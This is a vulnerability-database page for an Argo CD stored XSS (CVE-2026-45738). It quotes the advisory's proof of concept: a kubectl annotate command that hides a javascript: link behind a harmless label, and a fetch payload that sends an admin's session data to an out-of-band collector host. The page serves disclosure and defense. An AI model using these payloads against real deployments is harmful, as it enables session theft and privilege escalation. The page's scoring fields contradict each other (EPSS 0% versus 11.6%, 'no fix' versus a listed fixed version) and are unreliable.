CVE-2026-45738

HIGHPre-NVD 7.37.3
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.3 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 88% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
7.3
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 7.3Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Argo CD: Stored XSS in application link annotations enables developer-to-admin privilege escalation

Summary

A user with application write access (developer role) can set link.argocd.argoproj.io/* annotations on any ArgoCD Application. These annotation values are rendered in the Summary tab's URLs section as ` elements without URL validation. Using the pipe-separator trick (Display Text | javascript:...), an attacker can inject a javascript: URI while displaying a legitimate-looking label (e.g. GitHub Repo). When a higher-privileged user (admin) clicks the link, arbitrary JavaScript executes in the ArgoCD origin context in the admin's authenticated session context, enabling API exfiltration and privilege escalation from developer to admin.

Details

Vulnerable sink: ui/src/app/applications/components/application-summary/application-summary.tsx:277

const parts = (url || '').split('|');
 1 ? parts[1] : parts[0]} target='_blank'>
    {parts[0]}

The annotation value is split on |. parts[0] becomes the visible link label; parts[1] becomes the href. No call to isValidURL() is made, unlike the protected ApplicationURLs component (application-urls.tsx:72,80) which does validate URLs and blocks javascript:. The target='_blank' opens a new tab that inherits the ArgoCD origin, giving the injected script same-origin fetch access to all ArgoCD APIs using the victim's authenticated session (credentialed fetch() calls).

Root cause: React 16.x does not block javascript: URIs in href attributes (this protection was added in React 19). The helper isValidURL() exists in shared/utils.ts but is not applied to this sink.

CSP: ArgoCD's default Content Security Policy is frame-ancestors 'self' only — no script-src, no connect-src, no default-src — providing zero XSS execution mitigation.

PoC

Prerequisites: Developer role with application write access (e.g. RBAC: p, role:developer, applications, *, */*, allow).

Step 1 — Set malicious annotation as developer:

kubectl annotate application  -n argocd \
  'link.argocd.argoproj.io/docs=GitHub Repo|javascript:fetch("https:///api/v1/session/userinfo",{credentials:"include"}).then(r=>r.json()).then(d=>fetch("https://xxx.oastify.com/?d="+btoa(JSON.stringify(d)),{mode:"no-cors"}))'

The URL section in the admin's Summary tab renders the link as "GitHub Repo" — the javascript: payload is invisible in the displayed text.

Step 2 — Admin opens Summary tab of the annotated application and clicks the link.

Step 3 — JavaScript executes at the ArgoCD origin and exfiltrates admin session data via out-of-band HTTP request. Tested with Burp Collaborator:

// Payload used during testing (Burp Collaborator OOB):
fetch("https:///api/v1/session/userinfo", {credentials:"include"})
  .then(r => r.json())
  .then(d => fetch("https://xxx.oastify.com/?d=" + btoa(JSON.stringify(d)), {mode:"no-cors"}))

Step 4 — Burp Collaborator received the OOB HTTP interaction containing the base64-encoded admin session data. Decoded response:

{"iss":"argocd","loggedIn":true,"username":"admin"}

Tested on: ArgoCD v3.3.8 (commit 0850e97), React 16.9.3.

Impact

  • Stored XSS — payload persists in the Kubernetes Application resource until manually removed
  • Privilege escalation — developer role → admin session hijacking via authenticated API calls
  • Maximum stealth — the injected link displays as any attacker-chosen text; the javascript: href is never visible to the victim
  • No server-side interaction required — purely client-side exploit, no network egress needed for execution (exfiltration uses no-cors fetch, bypassed by absent connect-src` CSP)
  • Any admin or operator who views the Summary tab of the compromised application is affected

Credits

Discovered and reported by Jan Kahmen ([email protected]) — turingpoint.de

CVSS v3
7.3
EG Score
7.3(low)
EPSS
11.6%
KEV
Not listed

Published

May 19, 2026

Last Modified

May 19, 2026

Vendor Advisories for CVE-2026-45738(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(3 across 1 ecosystem)
Go(3)
PackageVulnerable rangeFixed inDependents
github.com/argoproj/argo-cd
github.com/argoproj/argo-cd/v2
github.com/argoproj/argo-cd/v33.4.2

Data Freshness Timeline

(refreshed 0× in last 7d / 21× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-06-29 20:54 UTCEG score recompute
  2. 2026-06-28 08:39 UTCEG score recompute
  3. 2026-06-27 20:25 UTCEG score recompute
  4. 2026-06-27 08:05 UTCEG score recompute
  5. 2026-06-26 19:48 UTCEG score recompute
  6. 2026-06-26 05:20 UTCEG score recompute
  7. 2026-06-25 17:06 UTCEG score recompute
  8. 2026-06-18 00:00 UTCEG score recompute
  9. 2026-06-17 11:46 UTCEG score recompute
  10. 2026-06-16 20:52 UTCEG score recompute
  11. 2026-06-16 04:55 UTCEG score recompute
  12. 2026-06-15 16:23 UTCEG score recompute
  13. 2026-06-14 23:18 UTCEPSS rescore
  14. 2026-06-14 23:07 UTCEG score recompute
  15. 2026-06-14 10:53 UTCEG score recompute
  16. 2026-06-13 23:00 UTCEPSS rescore
  17. 2026-06-13 22:40 UTCEG score recompute
  18. 2026-06-13 09:41 UTCEG score recompute
  19. 2026-06-12 23:12 UTCEPSS rescore
  20. 2026-06-12 21:26 UTCEG score recompute
  21. 2026-06-12 09:11 UTCEG score recompute
  22. 2026-06-11 20:57 UTCEG score recompute
  23. 2026-06-11 08:43 UTCEG score recompute
  24. 2026-06-10 20:28 UTCEG score recompute
  25. 2026-06-10 08:15 UTCEG score recompute
Show 19 more
  1. 2026-06-09 20:01 UTCEG score recompute
  2. 2026-06-09 07:47 UTCEG score recompute
  3. 2026-06-08 19:33 UTCEG score recompute
  4. 2026-06-08 06:39 UTCEG score recompute
  5. 2026-06-07 18:25 UTCEG score recompute
  6. 2026-06-07 06:11 UTCEG score recompute
  7. 2026-06-06 17:57 UTCEG score recompute
  8. 2026-06-06 05:43 UTCEG score recompute
  9. 2026-06-05 17:29 UTCEG score recompute
  10. 2026-06-05 05:14 UTCEG score recompute
  11. 2026-06-04 17:00 UTCEG score recompute
  12. 2026-06-04 04:46 UTCEG score recompute
  13. 2026-06-03 16:32 UTCEG score recompute
  14. 2026-06-03 04:18 UTCEG score recompute
  15. 2026-06-02 16:04 UTCEG score recompute
  16. 2026-06-02 03:50 UTCEG score recompute
  17. 2026-06-01 15:36 UTCEG score recompute
  18. 2026-06-01 03:22 UTCEG score recompute
  19. 2026-05-24 06:14 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-45738?
CVE-2026-45738 is a high vulnerability published on May 19, 2026. Argo CD: Stored XSS in application link annotations enables developer-to-admin privilege escalation Summary A user with application write access (developer role) can set link.argocd.argoproj.io/* annotations on any ArgoCD Application. These annotation values are rendered in the Summary tab's URLs…
When was CVE-2026-45738 disclosed?
CVE-2026-45738 was first published in the National Vulnerability Database on May 19, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-45738 actively exploited?
CVE-2026-45738 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 11.6% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-45738?
CVE-2026-45738 has a CVSS v4.0 base score of 7.3 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-45738?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-45738, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-45738

Explore →

Is Your Infrastructure Affected by CVE-2026-45738?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.